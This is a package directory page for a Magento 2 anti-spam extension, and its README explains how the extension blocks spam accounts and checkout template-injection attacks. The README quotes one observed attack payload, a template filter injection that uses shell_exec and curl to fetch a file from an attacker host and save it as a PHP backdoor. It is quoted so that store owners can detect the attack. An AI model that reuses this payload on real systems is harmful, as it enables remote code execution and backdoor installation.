PHPackages lazerbahn/magento2-simple-antispam - PHPackages - PHPackages [Skip to content](#main-content)[PHPackages](/)[Directory](/)[Categories](/categories)[Trending](/trending)[Leaderboard](/leaderboard)[Changelog](/changelog)[Analyze](/analyze)[Collections](/collections)[Log in](/login)[Sign up](/register) 1. [Directory](/) 2. / 3. [Security](/categories/security) 4. / 5. lazerbahn/magento2-simple-antispam ActiveMagento2-module[Security](/categories/security) lazerbahn/magento2-simple-antispam ================================== An M2 extension to block spam customer account creation 1.1.3(3y ago)03.2k↓50%MITPHPPHP >=7.0.0 Since Jan 17Pushed 3y ago1 watchersCompare [ Source](https://github.com/homecoded/Lazerbahn_Antispam)[ Packagist](https://packagist.org/packages/lazerbahn/magento2-simple-antispam)[ RSS](/packages/lazerbahn-magento2-simple-antispam/feed)WikiDiscussions master Synced 1mo ago READMEChangelog (4)Dependencies (3)Versions (5)Used By (0) Lazerbahn\_Antispam =================== [](#lazerbahn_antispam) A customizable and simple Magento 2 extension for blocking (russian) spambots creating new customer accounts and trying to hack Magento stores via template parameter injection in checkout. This extension is based on but heavily extended. WARNING! -------- [](#warning) This extension has been rushed to production and probably requires some changes by developers for your purposes. It's a quick and dirty patch for the current wave of hacking and spamming attacks. There is NO GUARANTEE that this exception will make your shop safe!! If you find orders in your shop that contain something like this ``` var this.getTemplateFilter().filter(foobar)var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.hacker.com/css/retro.css;mv${IFS%??}retro.css${IFS%??}a122.php")" ``` in the customer names that you have been targeted by an attack. Check the pub folder for new php files that have been placed there. Delete them immediately, they are backdoors! You want to erase and set up the whole system anew! As far as I can tell, it seems only Apache servers are really affected because nginx-setups only allow access to certain php files and the backdoor files are not in there. Nevertheless, even nginx servers receive the php files. So, hackers are able to place files on a system which is scary enough. This should only happen on outdated Magento 2 installs. Please update immediately! Installation ------------ [](#installation) ``` 1. $ composer require lazerbahn/magento2-simple-antispam 2. $ ./bin/magento module:enable Lazerbahn_Antispam 3. $ ./bin/magento setup:upgrade 4. $ ./bin/magento setup:di:compile 5. Profit. ``` usage ----- [](#usage) This extension is very simple. By default, it won't perform a registration request Or create guest orders when some registration fields contain special strings on a blacklist: You can specify those strings in the backend under Stores -> Configuration -> Lazerbahn -> Antispam- After installation you need to activate the extension there. Currently, this will only deactivate the account creation part. Sorry! You can change the whole extension behaviour according to your need. Just edit this file: ``` ./Plugin/Customer/Controller/Account/CreatePostPlugin.php ``` how it works ------------ [](#how-it-works) It's a simple interceptor plugin which wraps the \\Magento\\Customer\\Controller\\Account\\CreatePost::Execute() method into an around method. It will search all specified form fields for the spam content by a simple iteration. The original Execute() method will only be called if there was no spam string detected. For the guest checkout it goes through all the address fields and if it finds a blacklisted string it simple clears the address. This leads to a standard error that address is missing and hacker is stuck. Notice: ------- [](#notice) This Extension is meant to be used as a skeleton by developers. It is very primitive and may need customization. When installing via Composer, further upgrades will eliminate your customizations. Make sure to write an interceptor plugin by yourself, don't upgrade or use it as a local extension in the /app/code/ folder. Probably there will be a future version, capable of defining blacklisted strings and form fields via Magento Admin We're happy about every contribution :) ### Health Score 26 — LowBetter than 43% of packages Maintenance20 Infrequent updates — may be unmaintained Popularity21 Limited adoption so far Community9 Small or concentrated contributor base Maturity43 Maturing project, gaining track record Bus Factor1 Top contributor holds 88.9% of commits — single point of failure How is this calculated?**Maintenance (25%)** — Last commit recency, latest release date, and issue-to-star ratio. Uses a 2-year decay window. **Popularity (30%)** — Total and monthly downloads, GitHub stars, and forks. Logarithmic scaling prevents top-heavy scores. **Community (15%)** — Contributors, dependents, forks, watchers, and maintainers. Measures real ecosystem engagement. **Maturity (30%)** — Project age, version count, PHP version support, and release stability. ### Release Activity Cadence Every ~39 days Total 3 Last Release 1133d ago ### Community Maintainers ![](https://www.gravatar.com/avatar/3bdfcec51df4ff16ad44446b513985050cb67fdb88e6f20f6e9a23c13726321e?d=identicon)[fzemmel](/maintainers/fzemmel) --- Top Contributors [![homecoded](https://avatars.githubusercontent.com/u/565020?v=4)](https://github.com/homecoded "homecoded (8 commits)")[![lory-to](https://avatars.githubusercontent.com/u/103039848?v=4)](https://github.com/lory-to "lory-to (1 commits)") ### Code Quality TestsPHPUnit ### Embed Badge ![Health badge](/badges/lazerbahn-magento2-simple-antispam/health.svg) ``` [![Health](https://phpackages.com/badges/lazerbahn-magento2-simple-antispam/health.svg)](https://phpackages.com/packages/lazerbahn-magento2-simple-antispam) ``` ### Alternatives [veriteworks/cookiefix Magento2 extension for Cookie SameSite attribute. 65455.3k1](/packages/veriteworks-cookiefix)[imi/magento2-friendly-captcha Friendly Captcha integration for Magento2 18116.2k](/packages/imi-magento2-friendly-captcha)[basecom/magento2-csp-split-header Magento 2 module to split oversized CSP headers into multiple headers. 5256.6k](/packages/basecom-magento2-csp-split-header)[pixelopen/magento-cloudflare-turnstile Protect your store from spam messages and spam user accounts with Cloudflare Turnstile 5325.4k1](/packages/pixelopen-magento-cloudflare-turnstile)[yireo/magento2-csp-whitelist-inline-js Magento module to automatically add inline JS script to CSP whitelist 2974.7k](/packages/yireo-magento2-csp-whitelist-inline-js)[sansec/magento2-module-shield 14111.8k](/packages/sansec-magento2-module-shield) PHPackages © 2026 [Directory](/)[Categories](/categories)[Trending](/trending)[Changelog](/changelog)[Analyze](/analyze)